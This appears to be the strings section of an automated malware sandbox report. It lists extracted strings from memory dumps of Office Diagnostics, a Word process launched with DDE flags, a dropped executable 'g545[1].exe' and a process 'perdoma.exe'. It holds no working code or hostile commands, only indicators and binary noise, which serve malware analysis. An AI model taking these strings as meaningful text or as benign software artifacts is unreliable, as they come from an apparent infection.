Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

+j+k/!

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

+Y+d8

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

.?AUIPropertyChangeListener@FlexUI@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AUIUnknown@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVBaseFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCAutoFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCannotConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCompatDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCConnectCanceledPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticsPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiskDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroAutoPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroManualPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCManualFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCMemDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCOMClassPCL@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCrashesHangsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCResultsSummaryPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCRootEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCSetupDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCTryToConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCUpdateDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCWatsonDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVDiskErrorsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameEqualizer@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVGroupBoxFrameImp

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVInstallerEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVLeafFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOS_HEAP@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVOverlapFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVROCKALL_FRONT_END@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVTableFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVVertFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

0$6\7

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

1\1e1|1

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

2 2$2(2,2024282<2@2D2

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

354W4

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4 4(4

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4518.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4K5]5c5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

4X5\5`5d5h5l5p5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5 5$5(5,5054585<5@5D5

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5 5(50585@5H5P5X5,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

5(6,6064686<6@6D6H6L6P6T6X6\6`6d6

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

6,606L6P6l6p6

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

7 7,787

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

7`8v?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

7K:!;?={=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9 9$9(9,9094989<9@9D9H9L9P9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9$909<9

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

9h>p>x>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

; ;$;(;,;0;4;8;<;

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

; ;8;"<J<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<$<R<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<*<b==?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<,<W<

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<9=B=M=U=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<:>u?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<B=F=J=N=R=V=Z=^=Q?s?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<S=O>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

<W=$>i>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

==3=A=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=>@>}>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

= =$=

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=$>*>C>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=)=j?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=L=n?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=L>p>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=q>p?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

=V>k>7?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>?"?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>!>?#?P?}?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>1?A?Q?j?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>6?M?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>^>d>k>

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>G?m?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>t>"?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

>|>W?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?8?<?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

? ?(?0?8?@?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

?,?e?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

?@?D?H?L?P?T?X?\?`?d?h?

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

agnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

ation

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

%COMMONPROGRAMFILES%\Microsoft Shared\office12;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Micros

Unicode based on Runtime Data (OffDiag.exe )

d trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

D:(A;;0x120003;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x120003;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x12001F;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0x1201FD;;;BA)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

D:(A;;0xA201FD;;;IU)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

egistered trademark of Microsoft Corporation.

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

ProductName

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

rnalName

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

soft Office Diagnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

Software\Microsoft\Office\Common\OffDiag\6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

U%'&$]

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

uctVersion

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

UIFILE

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

uwxz~

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

VarFileInfo

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

/n /dde

Ansi based on Process Commandline (WINWORD.EXE)

-x -s 624

Ansi based on Process Commandline (g)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (g545[1].exe.177218)

.idata

Ansi based on Dropped File (g545[1].exe.177218)

.rsrc

Ansi based on Dropped File (g545[1].exe.177218)

.text

Ansi based on Dropped File (g545[1].exe.177218)

28_zo

Ansi based on Dropped File (g545[1].exe.177218)

@.data

Ansi based on Dropped File (g545[1].exe.177218)

`.rdata

Ansi based on Dropped File (g545[1].exe.177218)

eh}_k=<m

Ansi based on Dropped File (g545[1].exe.177218)

ij0>tF

Ansi based on Dropped File (g545[1].exe.177218)

m{hAXO

Ansi based on Dropped File (g545[1].exe.177218)

TZtFz

Ansi based on Dropped File (g545[1].exe.177218)

IHDR

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Corporation

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

legacy CPL elevated

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Operating System

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

"80736a2c7a55d11:0"

Unicode based on Runtime Data (perdoma.exe )

$$$IQ`_``a\a\_SRU]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$$IQ````ca\a__a...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$IQ````aca_a\]_]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(--------------,-,,.,(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(555442424240,,,22111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444222222111111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444444141411111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55555555555555554444(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

*(((((((((((((((((((()

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

+((((((((((((((((((((*

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

.7603.16385 (win7_rtm.090713-1255)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

1=vf

Ansi based on Runtime Data (perdoma.exe )

40+,,41221(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444414122(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444422211(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

4444422222(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

6.3.7603.16385

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

6>AF

Ansi based on Runtime Data (perdoma.exe )

:#;7;B;M;

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

;Y<,=

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

>%*P

Ansi based on Runtime Data (perdoma.exe )

><>V>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>J

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>\]FIIIIIIIIIIFQ`LLLLLL_TRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>]>c>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.419000.00000002.mdmp)

>_]]QQQQQQRQRQQQ_``__STTRRRR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>S]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

>S]]a]aaa]]]]]]a```____R_R_U]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000001.200171.40F000.00000002.mdmp)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (perdoma.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (perdoma.exe )

_chkstk

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

AutoDetect

Unicode based on Runtime Data (perdoma.exe )

b$=tfE

Ansi based on Runtime Data (perdoma.exe )

%TEMP%\C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Microsoft Office\Office12\

Unicode based on Runtime Data (perdoma.exe )

C]]]]]]]]]]]]]]]]]]]]]]]]]]...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

C_]a`a]]ac]a]a]a]a`a\a\a\ac...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

CLUSAPI.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

ClusterNetworkEnum

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

CompanyName

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (perdoma.exe )

CreateHardLinkW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

D$0.|

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$@@x

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$`+f

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$hnf

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$lR3

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$x0q

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

D$X@x

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

DisconnectNamedPipe

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

DKLKKKLKKLKKKKLKLKLKLMKKKKLKL>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

en-US

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

EnableConsoleTracing

Unicode based on Runtime Data (perdoma.exe )

EnableFileTracing

Unicode based on Runtime Data (perdoma.exe )

EnumUILanguagesA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

FileDirectory

Unicode based on Runtime Data (perdoma.exe )

FileTracingMask

Unicode based on Runtime Data (perdoma.exe )

FillConsoleOutputCharacterA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

FoldStringW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

FreeConsole

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetCommProperties

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetCPInfoExW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetEnvironmentStrings

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetProfileStringA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetVolumeNameForVolumeMountPointW

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

GetWriteWatch

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

Unicode based on Runtime Data (perdoma.exe )

IQ^LLLLLL___RR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

IQ```a\a_`_URR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

IQ`LLLLLL\]a_a]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

is_wctype

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

isdigit

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

J>>>>>>>>>>>>>>>>ACA>>>>>>>>>G

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

jurrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrruj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

juuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuj

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

K2@K2@

Ansi based on Hybrid Analysis (perdoma.exe , 00177718-00001784.00000001.200171.401000.00000020.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

k#L6

